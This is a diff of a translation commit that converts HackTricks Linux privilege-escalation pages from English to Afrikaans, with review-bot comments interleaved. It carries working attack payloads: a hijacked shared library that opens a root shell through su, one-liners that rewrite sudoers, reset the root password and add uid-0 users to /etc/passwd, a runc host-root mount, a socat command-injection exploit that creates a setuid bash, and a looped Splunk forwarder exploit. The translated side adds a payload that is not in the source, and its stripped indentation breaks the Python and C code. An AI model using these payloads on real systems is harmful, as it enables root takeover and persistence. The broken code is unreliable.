(0x00007fe473249000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) +libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) +libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) +/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) ``` - -In this case lets try to impersonate `/lib/x86_64-linux-gnu/libaudit.so.1`.\ -So, check for functions of this library used by the **`su`** binary: - +In hierdie geval gaan ons probeer om `/lib/x86_64-linux-gnu/libaudit.so.1` na te boots.\ +Dus, kyk vir funksies van hierdie biblioteek wat deur die **`su`** binêre lêer gebruik word: ```bash objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_open @@ -93,9 +296,7 @@ objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message 000000000020e968 g DO .bss 0000000000000004 Base audit_fd ``` - -The symbols `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` and `audit_fd` are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit. - +Die simbole `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` en `audit_fd` is waarskynlik afkomstig van die libaudit.so.1-biblioteek. Aangesien die libaudit.so.1 oorskryf sal word deur die skadelike gedeelde biblioteek, moet hierdie simbole teenwoordig wees in die nuwe gedeelde biblioteek, anders sal die program nie in staat wees om die simbool te vind en sal dit afsluit. ```c #include #include 
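Review bot: @@ -50,42 +257,38 @@ in payloads-to-execute.md strips the indentation from both the `paramList` C body and the `ldd /bin/su` output (`+libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 ...` at column 0), and drops the blank lines that separated prose from fences, so "+Kyk na 'n biblioteek ... `/bin/su`:" now butts directly against the opening ```` ```bash ````; keep the original whitespace and blank lines so the rendered page and the program output stay as they were. The prose translation itself ("Oorskryf 'n biblioteek", "Gewone lêers") reads fine.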
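Review bot: the translated sentence in @@ -93,9 +296,7 @@ carries over a duplicated symbol from the English, "`audit_open`, `audit_log_acct_message`, `audit_log_acct_message` en `audit_fd`", while the `objdump -T /bin/su | grep audit` output above it lists `audit_log_acct_message` only once; since the line is being rewritten anyway, drop the repeat. The removed blank lines around the paragraph should also be kept for the same readability reason as in the previous hunk.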
@@ -112,44 +313,41 @@ void inject()__attribute__((constructor)); void inject() { - setuid(0); - setgid(0); - system("/bin/bash"); +setuid(0); +setgid(0); +system("/bin/bash"); } ``` +Nou, deur eenvoudig **`/bin/su`** te roep, sal jy 'n skul as root verkry. -Now, just calling **`/bin/su`** you will obtain a shell as root. +## Skripte -## Scripts - -Can you make root execute something? - -### **www-data to sudoers** +Kan jy maak dat root iets uitvoer? +### **www-data na sudoers** ```bash echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update ``` - -### **Change root password** - +### **Verander root wagwoord** ```bash echo "root:hacked" | chpasswd ``` +### Voeg 'n nuwe root-gebruiker by in /etc/passwd -### Add new root user to /etc/passwd - +```bash +echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd +``` ```bash echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
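Review bot: @@ -112,44 +313,41 @@ in payloads-to-execute.md adds a second fenced block under "### Voeg 'n nuwe root-gebruiker by in /etc/passwd" (`+echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd`) that is not in the English source, placed ahead of the original `echo hacker:$((mkpasswd ...` block; a translation must not add payloads, so remove it. "sal jy 'n skul as root verkry" has a typo ("skulp" for shell). The `inject()` body also lost its indentation (`+setuid(0);`, `+setgid(0);`, `+system("/bin/bash");` at column 0); restore it, as code should be byte-identical across a translation commit.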
diff --git a/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/linux-hardening/privilege-escalation/runc-privilege-escalation.md index 9a4fff6e0..dc91c1591 100644 --- a/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -1,22 +1,22 @@ -# RunC Privilege Escalation +# RunC Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic information +## Basiese inligting -If you want to learn more about **runc** check the following page: +As jy meer wil leer oor **runc**, kyk na die volgende bladsy: {% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} [2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md) @@ -24,22 +24,21 @@ If you want to learn more about **runc** check the following page: ## PE -If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**. - +As jy vind dat `runc` op die gasheer geïnstalleer is, kan jy dalk **'n houer hardloop wat die wortel /-vouer van die gasheer monteer**. ```bash runc -help #Get help and see if runc is intalled runc spec #This will create the config.json file in your current folder Inside the "mounts" section of the create config.json add the following lines: { - "type": "bind", - "source": "/", - "destination": "/", - "options": [ - "rbind", - "rw", - "rprivate" - ] +"type": "bind", +"source": "/", +"destination": "/", +"options": [ +"rbind", +"rw", +"rprivate" +] }, #Once you have modified the config.json file, create the folder rootfs in the same directory 
@@ -49,21 +48,20 @@ mkdir rootfs # The root folder is the one from the host runc run demo ``` - {% hint style="danger" %} -This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers. +Dit sal nie altyd werk nie, aangesien die verstekbedryf van runc is om as root uit te voer, so om dit as 'n onbevoorregte gebruiker uit te voer, kan eenvoudig nie werk nie (tensy jy 'n rootless-konfigurasie het). Om 'n rootless-konfigurasie die verstek te maak, is oor die algemeen nie 'n goeie idee nie, omdat daar heelwat beperkings binne rootless-houers is wat nie buite rootless-houers van toepassing is nie. {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
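Review bot: the bind-mount fragment in runc-privilege-escalation.md @@ -24,22 +24,21 @@ loses its nesting (`+"type": "bind",` through `+]` all at column 0), so the reader can no longer see that `rbind`, `rw` and `rprivate` belong to the `options` array of that one mount entry; keep the original indentation, which is the only thing this hunk changes inside the fence. The surrounding Afrikaans ("'n houer hardloop wat die wortel /-vouer van die gasheer monteer") is a faithful rendering of the English.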
diff --git a/linux-hardening/privilege-escalation/selinux.md b/linux-hardening/privilege-escalation/selinux.md index 4550835bc..eac5b99fd 100644 --- a/linux-hardening/privilege-escalation/selinux.md +++ b/linux-hardening/privilege-escalation/selinux.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# SELinux in Containers +# SELinux in Houers -[Introduction and example from the redhat docs](https://www.redhat.com/sysadmin/privileged-flag-container-engines) +[Introduksie en voorbeeld van die redhat-dokumentasie](https://www.redhat.com/sysadmin/privileged-flag-container-engines) -[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system. - -Container engines launch **container processes with a single confined SELinux label**, usually `container_t`, and then set the container inside of the container to be labeled `container_file_t`. The SELinux policy rules basically say that the **`container_t` processes can only read/write/execute files labeled `container_file_t`**. If a container process escapes the container and attempts to write to content on the host, the Linux kernel denies access and only allows the container process to write to content labeled `container_file_t`. +[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is 'n **etiketteringstelsel**. Elke **proses** en elke **lêersisteemobjek** het 'n **etiket**. SELinux-beleide definieer reëls oor wat 'n **prosesetiket mag doen met al die ander etikette** op die stelsel. +Houer-enjins begin **houerprosesse met 'n enkele beperkte SELinux-etiket**, gewoonlik `container_t`, en stel dan die houer binne die houer in om geëtiketteer te word as `container_file_t`. Die SELinux-beleidreëls sê basies dat die **`container_t`-prosesse slegs lêes/skryf/voer lêers uit wat geëtiketteer is as `container_file_t`**. As 'n houerproses ontsnap uit die houer en probeer skryf na inhoud op die gasheer, weier die Linux-kernel toegang en laat slegs die houerproses toe om te skryf na inhoud wat geëtiketteer is as `container_file_t`. 
```shell $ podman run -d fedora sleep 100 d4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb @@ -30,24 +27,6 @@ $ podman top -l label LABEL system_u:system_r:container_t:s0:c647,c780 ``` +# SELinux Gebruikers -# SELinux Users - -There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - +Daar is SELinux-gebruikers bo en behalwe die gewone Linux-gebruikers. SELinux-gebruikers maak deel uit van 'n SELinux-beleid. Elke Linux-gebruiker word gekarteer na 'n SELinux-gebruiker as deel van die beleid. Dit stel Linux-gebruikers in staat om die beperkings en sekuriteitsreëls en -meganismes wat op SELinux-gebruikers geplaas is, te erf. diff --git a/linux-hardening/privilege-escalation/socket-command-injection.md b/linux-hardening/privilege-escalation/socket-command-injection.md index 89d216a95..8c2c06b64 100644 --- a/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/linux-hardening/privilege-escalation/socket-command-injection.md @@ -1,77 +1,67 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Socket binding example with Python +## Voorbeeld van sokkelbinding met Python -In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible. +In die volgende voorbeeld word 'n **Unix-sokkel geskep** (`/tmp/socket_test.s`) en alles wat **ontvang** word, sal uitgevoer word deur `os.system`. Ek weet dat jy dit nie in die wild gaan vind nie, maar die doel van hierdie voorbeeld is om te sien hoe 'n kode wat Unix-sokkels gebruik, lyk, en hoe om die inset in die ergste geval te hanteer. {% code title="s.py" %} ```python import socket import os, os.path import time -from collections import deque +from collections import deque if os.path.exists("/tmp/socket_test.s"): - os.remove("/tmp/socket_test.s") +os.remove("/tmp/socket_test.s") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind("/tmp/socket_test.s") os.system("chmod o+w /tmp/socket_test.s") while True: - server.listen(1) - conn, addr = server.accept() - datagram = conn.recv(1024) - if datagram: - print(datagram) - os.system(datagram) - conn.close() +server.listen(1) +conn, addr = server.accept() +datagram = conn.recv(1024) +if datagram: +print(datagram) +os.system(datagram) +conn.close() ``` {% endcode %} -**Execute** the code using python: `python s.py` and **check how the socket is listening**: - +**Voer** die kode uit met behulp van Python: `python s.py` en **kontroleer hoe die sokket luister**: ```python netstat -a -p --unix | grep "socket_test" (Not all processes could be identified, non-owned process info - will not be shown, you would have to be root to see it all.) +will not be shown, you would have to be root to see it all.) 
unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s ``` - -**Exploit** - +**Uitbuiting** ```python echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
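Review bot: the translated `s.py` block is no longer valid Python. The `+` lines drop the indentation of the `if` body and of everything inside `while True:`, so `+os.remove("/tmp/socket_test.s")`, `+server.listen(1)` and `+os.system(datagram)` now sit at column 0 and the interpreter raises an IndentationError before the socket is even created. Restore the four-space indentation of the removed lines and, as a rule for translation commits, keep fenced code byte-for-byte identical to the source. The same whitespace stripping hit the continuation line of the netstat output, which is harmless but equally unnecessary. Two smaller points while touching this block: both shell blocks (the netstat check and the socat exploit) are fenced as ```python in old and new text and should be ```bash, and the translation alternates between "sokkel" and "sokket" for socket; pick one term and use it throughout.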
- - diff --git a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index 65996b6dd..67c11e3fd 100644 --- a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md @@ -1,77 +1,76 @@ -# Splunk LPE and Persistence +# Splunk LPE en Volharding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root. +As jy 'n masjien **intern** of **ekstern ondersoek** en jy vind **Splunk wat loop** (poort 8090), as jy gelukkig enige **geldige geloofsbriewe** ken, kan jy die Splunk-diens misbruik om 'n skul te **uitvoer** as die gebruiker wat Splunk laat loop. As root dit laat loop, kan jy voorregte na root eskaleer. -Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host. +As jy reeds root is en die Splunk-diens nie net op die localhost luister nie, kan jy die wagwoordlêer **van** die Splunk-diens **steel** en die wagwoorde **kraak**, of **nuwe** geloofsbriewe daaraan toevoeg. En volharding op die gasheer handhaaf. -In the first image below you can see how a Splunkd web page looks like. +In die eerste prentjie hieronder kan jy sien hoe 'n Splunkd-webblad lyk. -## Splunk Universal Forwarder Agent Exploit Summary +## Splunk Universal Forwarder Agent Exploit Opsomming -For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary: +Vir verdere besonderhede, kyk na die pos [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). 
Hierdie is net 'n opsomming: -**Exploit Overview:** -An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network. +**Exploit-oorsig:** +'n Exploit wat die Splunk Universal Forwarder Agent (UF) teiken, maak dit vir aanvallers met die agentwagwoord moontlik om arbitrêre kode op stelsels wat die agent laat loop, uit te voer, wat potensieel 'n hele netwerk kan benadeel. -**Key Points:** -- The UF agent does not validate incoming connections or the authenticity of code, making it vulnerable to unauthorized code execution. -- Common password acquisition methods include locating them in network directories, file shares, or internal documentation. -- Successful exploitation can lead to SYSTEM or root level access on compromised hosts, data exfiltration, and further network infiltration. +**Kernpunte:** +- Die UF-agent valideer nie inkomende verbindings of die egtheid van kode nie, wat dit vatbaar maak vir ongemagtigde kode-uitvoering. +- Gewone metodes vir die verkryging van wagwoorde sluit in die vind daarvan in netwerkgidslys, lêerdeling of interne dokumentasie. +- Suksesvolle uitbuiting kan lei tot toegang op die vlak van SYSTEM of root op gekompromitteerde gasheer, data-uitvoer en verdere netwerkinfiltrasie. -**Exploit Execution:** -1. Attacker obtains the UF agent password. -2. Utilizes the Splunk API to send commands or scripts to the agents. -3. Possible actions include file extraction, user account manipulation, and system compromise. +**Uitbuiting van Exploit:** +1. Aanvaller verkry die UF-agentwagwoord. +2. Maak gebruik van die Splunk API om opdragte of skripte na die agente te stuur. +3. Moontlike aksies sluit lêeronttrekking, manipulasie van gebruikersrekeninge en stelselkompromittering in. -**Impact:** -- Full network compromise with SYSTEM/root level permissions on each host. 
-- Potential for disabling logging to evade detection. -- Installation of backdoors or ransomware. +**Impak:** +- Volledige netwerkbenadeling met SYSTEM/root-vlak-toestemmings op elke gasheer. +- Moontlikheid om logboekinskrywings te deaktiveer om opsporing te ontduik. +- Installasie van agterdeure of losprysware. -**Example Command for Exploitation:** +**Voorbeeldopdrag vir Uitbuiting:** ```bash for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done ``` - -**Usable public exploits:** +**Bruikbare openbare exploits:** * https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 * https://www.exploit-db.com/exploits/46238 * https://www.exploit-db.com/exploits/46487 -## Abusing Splunk Queries +## Misbruik van Splunk-aanvragen -**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** +**Vir verdere besonderhede, kyk na die pos 